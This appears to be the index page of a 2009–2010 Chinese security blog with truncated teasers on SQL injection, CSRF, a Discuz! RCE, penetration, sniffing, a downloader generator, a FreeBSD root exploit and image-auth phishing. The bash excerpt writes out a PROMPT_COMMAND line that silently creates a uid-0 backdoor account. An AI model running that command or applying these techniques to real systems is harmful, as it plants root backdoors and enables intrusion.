暖月

绕过单引号继续注入

暖月 — Mon, 22 Feb 2010 13:21:27 +0000

文/图饭

Web应用程序一般都会使用数据库来保存各种信息，比如电子商务网站的帐户信息、销售商品的价格，订单、支付细节、和各种不同的权限数值等。数据库中的信息的读取、更新、增加或者删除等都是通过SQL来实现的，因此，在数据交互的环节没有安全过滤净化，则可能易于受到SQL注入攻击，严重的可能导致数据[......]

全文阅读

恭祝春节快乐

暖月 — Wed, 10 Feb 2010 04:27:33 +0000

春节快到了，恭祝大家：虎虎生财大吉大利春节快乐。

浅析跨站请求伪造

暖月 — Wed, 06 Jan 2010 17:40:37 +0000

文/饭

跨站请求伪造(cross-site request forgery)通常缩写为XSRF，直译为跨站请求伪造，即攻击者通过调用第三方网站的恶意脚本或者利用程序来伪造请求，当然并不需要向用户端伪装任何具有欺骗的内容，在用户不知情时攻击者直接利用用户的浏览器向攻击的应用程序提交一个已经预测好请求参数的操作数据包，利用的实质是劫持用户的会话状态，强行提交攻击者构造的具有“操作行为”的数据包。可以看出，最关键的是劫持用户的会话状态，所以说，导致XSRF漏洞的主要原因是会话状态的保持没有唯一时间特征的标识，即是说在使用HTTPCookie传送会话令牌的过程中，应该更谨慎的判断当前用户，而不是简单的通过操作数据包的Cookie值来鉴别，简单的说是每次数据交互时，对提交的数据包实行唯一性标识。 XSRF攻击流程大致如下：

[......]

全文阅读

Discuz! 7.x 远程代码执行漏洞

暖月 — Wed, 06 Jan 2010 17:06:16 +0000

文/oldjun

影响版本：Discuz! 7.1/7.2
漏洞分析：
下面来分析下这个远程代码执行漏洞，这个问题真的很严重，可以直接写shell的：
一、漏洞来自showmessage函数：

function showmessage($message, $url_forward = ''[......]

全文阅读

一次简单的“旁注”渗透

暖月 — Wed, 30 Dec 2009 05:08:46 +0000

文/饭、Beach

渗透的主机是一朋友的，双线架设的虚拟主机，里面有几个站，架构是apache+php+mysql。在测试前，信息收集是很重要的。从系统信息、数据库信息、网络设备信息、管理员的信息等，都是值的统计分析和利用的。先对主机来端口扫描：

由图可知：这台服务器开放了80、443、5901等[......]

全文阅读

linux的BASH提权

暖月 — Tue, 22 Dec 2009 11:26:48 +0000

文/xi4oyu 要利用成功的话，还得看管理员的习惯，是否喜欢用su切换成root BASH的环境变量 $PROMPT_COMMAND 这个变量保存了在主提示符$PS1显示之前需要执行的命令:

export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 kkoo &>/dev/null && echo kkoo:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"

[......]

全文阅读

Linux下渗透嗅探术

暖月 — Sun, 13 Dec 2009 15:56:15 +0000

文/饭 Beach 内网渗透在攻击层面，其实更趋向于社工和常规漏洞检测的结合，为了了解网内防护措施的设置是通过一步步的刺探和经验积累，有时判断出错，也能进入误区。但是如果能在网内进行嗅探，则能事半功倍，处于一个对网内设置完全透明的状态。本文将从一个注点引发的突破，到控制整个内网的全过程来跟大家讨论，内网的渗透嗅探术和安全防护一些内容。在寻找突破时，更多的是从应用服务来，而应用服务最直观的信息采集，就是端口扫描，不同的应用，开放的服务不一样。所以，在对网络进行信息收集时，大概分为这样两步：端口探测，程序指纹分析。在端口探测方面，个人喜欢用SuperScan来快速对网段里的应用进行判断，如图：

在掌握端口信息后，就要对服务应用程序的指纹进行分析，主要包括版本号、已知的漏洞信息、常规配置信息、针对此应用流行的攻击方法等。本文试着对网内一台提供WEB服务的主机作为突破口，提交一个畸形的请求，如图：[......]

全文阅读

XMLDOM下载者生成器(xmldown.hta)

暖月 — Tue, 08 Dec 2009 03:21:56 +0000

文/lcx

以下代码保存成hta文件，可生成js和vbs下载者

<script type="text/javascript"><!--mce:0--></script>
<h4>1.生成下载用的xml文件</h4>
选[......]

全文阅读

FreeBSD local r00t zeroday

暖月 — Tue, 08 Dec 2009 03:19:31 +0000

Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 “BiG TiME”

“Go fetch your FreeBSD r00tkitz” // [......]

全文阅读

图片引发验证的社工利用

暖月 — Sun, 29 Nov 2009 06:52:53 +0000

文/饭在这充满诱惑的网络，恶意攻击者的攻击手法层出不穷。而其中颇具难度的社会工程攻击在取得用户的信任的手段方面，往往更倾向于伪装用户服务提供商，或者是在用户交互时，直接进行欺骗。比较典型的网络钓鱼攻击是将用户引诱到一个通过精心设计与用户信任非常相似的钓鱼网站，让用户在不易察觉的情况下提供用户的个人敏感信息。在2004年，国内也曾出现过假冒银行的网站，比如假冒中国工商银行的网站。而这一篇文章，将主要介绍HTML语言里的图片标签引用而诱引的验证漏洞和其伪装的过程。在milw0rm.com网站，petros发布一篇题为《Image Authentication Injection Paper + PoC》的文章，里头提到通过创建一个php文件向客户端的浏览器发送401未经授权的状态而导致浏览器显示一个登录对话框（显示给用户好像是从目标网站）发起的一个授权认证对话框，而恶意攻击者会诱使用户输入帐户或者密码之类的敏感信息从而导致钓鱼式的攻击。其流程如下：

HTTP是一种基于请求与响应模式的、无状态的、应用层的协议，客户端向服务器发送一个请求，请求头包含请求的方法、URL、协议版本、以及包含请求修饰符、客户信息和内容的类似于MIME的消息结构。服务器以一个状态行作为响应，相应的内容包括消息协议的版本，成功或者错误编码加上包含服务器信息、实体元信息以及可能实体内容。对整个过程进行抓包:[......]

全文阅读